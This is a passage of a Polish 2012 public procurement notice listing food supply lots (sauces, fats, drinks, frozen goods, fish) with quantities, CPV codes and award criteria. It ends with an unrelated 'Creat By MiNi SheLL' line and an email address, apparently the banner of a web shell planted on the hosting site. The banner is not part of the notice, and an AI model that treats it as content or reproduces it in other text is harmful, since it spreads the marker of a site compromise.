przyprawa do kurczaka	szt	50
rosól drobiowy 1 kg	szt	5
rosół drobiowy kostki 60g 	szt	30
sos  bolones 0,500l	szt	20
sos do deserów 1 l	szt	10
sos do hamburgerow 1 l	szt	10
sos fix do spagetti 45g	szt	100
sos mix koper-zioł, włoski itp. 9g	szt	100
sos salatkowy mix 700g	szt	8
sos słodko-kwaśny  0,5	szt	48
sos sojowy 1l	szt	4
sól	kg	180
wafelek w polewie	szt	92
wafelek b/polewy typu grzesiek	szt	230
vegeta 200g	szt	80
wiórki kokosowe 0,25	szt	10
zestaw świateczny (np.czelolada, baton, mikołaj)	szt	45
zestaw świąeczny(np. Czekolada, zajączek, baton)	szt	45
ziele angielskie	szt	25
ziele angielskie 600g 	szt	2
zupki  chińska(ostra,łagodna rosołowa itp.)	szt	320
zupki chińska	szt	45
zelatyna 50g	szt	25
żurek w butelce 0,5l	szt	30
zurek w proszku 60g	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem 500g	szt	300
Margaryna  do pieczenia 250g	szt	50
masło roślinne 200g	szt	15
oliwa z oliwek 1 l	szt	1
olej 1l	szt	110
olej 3l	szt	20
smalec	kg	3
smalec 200g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	70
napoje niegazowane 1,5 l	szt	70
napój gazowany 2l	szt	14
napój n/g 2 l	szt	14
napój energet	szt	138
Woda mineralna 0,5 gazowana	szt	138
Woda 0,5 n/g 	szt	138
woda mineralna n/g 1,5 l 	szt	92
woda mineralna g 1,5 l 	szt	92
Woda miner n/g 1,5 l 	szt	9
woda gazowana 1,5 l	szt	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż 0.5 kg	szt	10
brukselka mroż. 2,5 kg	szt	10
brokuły mroż. 2,5 kg	szt	8
frytki  1kg	szt	18
frytki 450g	szt	20
Frytki 1,5 kg	szt	7
Frytki 2 kg	szt	8
groszek mrozony	kg	15
groszek mrozony 2,5 kg	szt	2
hamburger mrozony 	szt	80
kalafior mroz 2,5 kg	szt	2
kalafior mroż	kg	25
marchew mini 2,5 kg	szt	2
marchew kostka 2,5 kg	szt	2
marchew kostka mroż	kg	50
marchew z groszkiem 2,5 kg	szt	2
marchew z groszkiem mroż	kg	25
mieszanka kompotowa 	kg	15
pizza 500g	szt	80
pyzy z mięsem  	kg	80
pyzy z owocami (knedle)	kg	20
szpinak 1kg	szt	20
truskawki mrozone	kg	10
warzywa na patelnię	kg	10
warzywa na pat.chinskie	kg	5
zapiekanka 200g	szt	120
zupa wiosenna	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z morszczuka	kg	35
karp	kg	10
matijas	kg	18
mintaj wędzony	kg	6
paluszki rybne	kg	12
panga	kg	35
paprykarz 156g	szt	40
szprot w pomidorach	szt	40
śledź w pomidorach	szt	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com